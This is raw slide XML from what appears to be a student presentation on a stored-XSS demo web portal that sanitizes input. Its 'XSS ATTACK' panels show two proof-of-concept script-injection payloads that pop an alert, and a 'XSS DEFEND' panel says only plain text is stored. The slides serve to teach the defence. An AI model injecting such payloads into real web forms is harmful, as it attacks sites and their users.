                  <a:lnTo>
                    <a:pt x="124460" y="1050479"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="1050479"/>
                    <a:pt x="0" y="994599"/>
                    <a:pt x="0" y="926019"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13439023" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13507603" y="0"/>
                    <a:pt x="13563484" y="55880"/>
                    <a:pt x="13563484" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13563484" y="926020"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13563484" y="994599"/>
                    <a:pt x="13507603" y="1050479"/>
                    <a:pt x="13439023" y="1050479"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="50980"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1214788" y="8634729"/>
            <a:ext cx="16044512" cy="1180466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFD659"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Here we have created a webportal, which takes some input and sanitizes xss script and will store only plain text not a malacious code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sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1465220" y="692312"/>
            <a:ext cx="15357559" cy="1114425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="8760"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7300" spc="-146">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn"/>
              </a:rPr>
              <a:t>Stored XSS website Implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 4" id="4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="287898" y="1761475"/>
            <a:ext cx="8424485" cy="6489597"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11232646" cy="8652795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr name="Group 5" id="5"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="11232646" cy="8652795"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5923246" cy="4562828"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr name="Freeform 6" id="6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="false" flipV="false">
                <a:off x="0" y="0"/>
                <a:ext cx="5923247" cy="4562828"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect r="r" b="b" t="t" l="l"/>
                <a:pathLst>
                  <a:path h="4562828" w="5923247">
                    <a:moveTo>
                      <a:pt x="5798786" y="4562828"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="124460" y="4562828"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="55880" y="4562828"/>
                      <a:pt x="0" y="4506949"/>
                      <a:pt x="0" y="4438368"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="124460"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="55880"/>
                      <a:pt x="55880" y="0"/>
                      <a:pt x="124460" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="5798786" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="5867366" y="0"/>
                      <a:pt x="5923247" y="55880"/>
                      <a:pt x="5923247" y="124460"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="5923247" y="4438369"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="5923247" y="4506949"/>
                      <a:pt x="5867366" y="4562828"/>
                      <a:pt x="5798786" y="4562828"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="4A83A1">
                  <a:alpha val="56863"/>
                </a:srgbClr>
              </a:solidFill>
            </p:spPr>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 7" id="7"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="0" t="0" r="0" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="347554" y="1253297"/>
              <a:ext cx="10537538" cy="6001457"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="3004095" y="76999"/>
              <a:ext cx="4783246" cy="848997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="5459"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3899">
                  <a:solidFill>
                    <a:srgbClr val="FFD659"/>
                  </a:solidFill>
                  <a:latin typeface="League Spartan"/>
                </a:rPr>
                <a:t>XSS ATTACK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 9" id="9"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="987736" y="7543679"/>
              <a:ext cx="9043648" cy="685589"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="4339"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3099">
                  <a:solidFill>
                    <a:srgbClr val="FFD659"/>
                  </a:solidFill>
                  <a:latin typeface="League Spartan"/>
                </a:rPr>
                <a:t>&lt;script&gt;alert("hello");&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8903932" y="1761475"/>
            <a:ext cx="9292330" cy="6489595"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12389773" cy="8652794"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr name="Group 11" id="11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="12389773" cy="8652794"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="6533427" cy="4562828"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr name="Freeform 12" id="12"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="false" flipV="false">
                <a:off x="0" y="0"/>
                <a:ext cx="6533428" cy="4562828"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect r="r" b="b" t="t" l="l"/>
                <a:pathLst>
                  <a:path h="4562828" w="6533428">
                    <a:moveTo>
                      <a:pt x="6408967" y="4562827"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="124460" y="4562827"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="55880" y="4562827"/>
                      <a:pt x="0" y="4506947"/>
                      <a:pt x="0" y="4438367"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="124460"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="55880"/>
                      <a:pt x="55880" y="0"/>
                      <a:pt x="124460" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="6408967" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="6477547" y="0"/>
                      <a:pt x="6533428" y="55880"/>
                      <a:pt x="6533428" y="124460"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="6533428" y="4438367"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="6533428" y="4506948"/>
                      <a:pt x="6477547" y="4562828"/>
                      <a:pt x="6408967" y="4562828"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="4A83A1">
                  <a:alpha val="65882"/>
                </a:srgbClr>
              </a:solidFill>
            </p:spPr>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 13" id="13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect l="0" t="0" r="33876" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="1752570" y="1631327"/>
              <a:ext cx="8821407" cy="5270794"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 14" id="14"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="2687736" y="327740"/>
              <a:ext cx="6420535" cy="848995"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="5459"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3900">
                  <a:solidFill>
                    <a:srgbClr val="FFCC59"/>
                  </a:solidFill>
                  <a:latin typeface="League Spartan"/>
                </a:rPr>
                <a:t>XSS DEFEND</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 15" id="15"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="1546638" y="7543677"/>
              <a:ext cx="10307804" cy="685589"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="4339"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3099">
                  <a:solidFill>
                    <a:srgbClr val="FFD659"/>
                  </a:solidFill>
                  <a:latin typeface="League Spartan"/>
                </a:rPr>
                <a:t>Only Plain text format will be stored</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 16" id="16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="287898" y="8723794"/>
            <a:ext cx="17687575" cy="1369887"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13563484" cy="1050479"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 17" id="17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="13563484" cy="1050479"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1050479" w="13563484">
                  <a:moveTo>
                    <a:pt x="13439023" y="1050479"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="1050479"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="1050479"/>
                    <a:pt x="0" y="994599"/>
                    <a:pt x="0" y="926019"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13439023" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13507603" y="0"/>
                    <a:pt x="13563484" y="55880"/>
                    <a:pt x="13563484" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13563484" y="926020"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13563484" y="994599"/>
                    <a:pt x="13507603" y="1050479"/>
                    <a:pt x="13439023" y="1050479"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="50980"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="353630" y="8843871"/>
            <a:ext cx="17718807" cy="9766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Here we have written 'alert("hello");', this in between of java script code so its a malicious code, but sanitization and input validation removes malacious code and returns only plain text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sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1465220" y="692312"/>
            <a:ext cx="15357559" cy="1114425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="8760"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7300" spc="-146">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn"/>
              </a:rPr>
              <a:t>Stored XSS website Implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 4" id="4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="287898" y="1761475"/>
            <a:ext cx="8424485" cy="6489597"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5923246" cy="4562828"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 5" id="5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="5923247" cy="4562828"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="4562828" w="5923247">
                  <a:moveTo>
                    <a:pt x="5798786" y="4562828"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="4562828"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="4562828"/>
                    <a:pt x="0" y="4506949"/>
                    <a:pt x="0" y="4438368"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5798786" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5867366" y="0"/>
                    <a:pt x="5923247" y="55880"/>
                    <a:pt x="5923247" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5923247" y="4438369"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5923247" y="4506949"/>
                    <a:pt x="5867366" y="4562828"/>
                    <a:pt x="5798786" y="4562828"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="56863"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8903932" y="1761475"/>
            <a:ext cx="9292330" cy="6489595"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6533427" cy="4562828"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="6533428" cy="4562828"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="4562828" w="6533428">
                  <a:moveTo>
                    <a:pt x="6408967" y="4562827"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="4562827"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="4562827"/>
                    <a:pt x="0" y="4506947"/>
                    <a:pt x="0" y="4438367"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6408967" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6477547" y="0"/>
                    <a:pt x="6533428" y="55880"/>
                    <a:pt x="6533428" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6533428" y="4438367"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6533428" y="4506948"/>
                    <a:pt x="6477547" y="4562828"/>
                    <a:pt x="6408967" y="4562828"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="65882"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 8" id="8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="287898" y="8723794"/>
            <a:ext cx="17687575" cy="1369887"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13563484" cy="1050479"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 9" id="9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="13563484" cy="1050479"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1050479" w="13563484">
                  <a:moveTo>
                    <a:pt x="13439023" y="1050479"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="1050479"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="1050479"/>
                    <a:pt x="0" y="994599"/>
                    <a:pt x="0" y="926019"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13439023" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13507603" y="0"/>
                    <a:pt x="13563484" y="55880"/>
                    <a:pt x="13563484" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13563484" y="926020"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13563484" y="994599"/>
                    <a:pt x="13507603" y="1050479"/>
                    <a:pt x="13439023" y="1050479"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="50980"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 10" id="10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="0" t="0" r="259" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="398960" y="2864919"/>
            <a:ext cx="8202360" cy="4195375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 11" id="11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="0" t="2565" r="33767" b="2565"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10063910" y="3040411"/>
            <a:ext cx="6468611" cy="2863315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2540970" y="1802556"/>
            <a:ext cx="3587434" cy="653416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5459"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3899">
                <a:solidFill>
                  <a:srgbClr val="FFD659"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>XSS ATTACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="456942" y="7421616"/>
            <a:ext cx="8086397" cy="438786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3639"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2599">
                <a:solidFill>
                  <a:srgbClr val="FFD659"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>&lt;IMG """&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"\&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 14" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10919733" y="1990611"/>
            <a:ext cx="4815401" cy="653415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
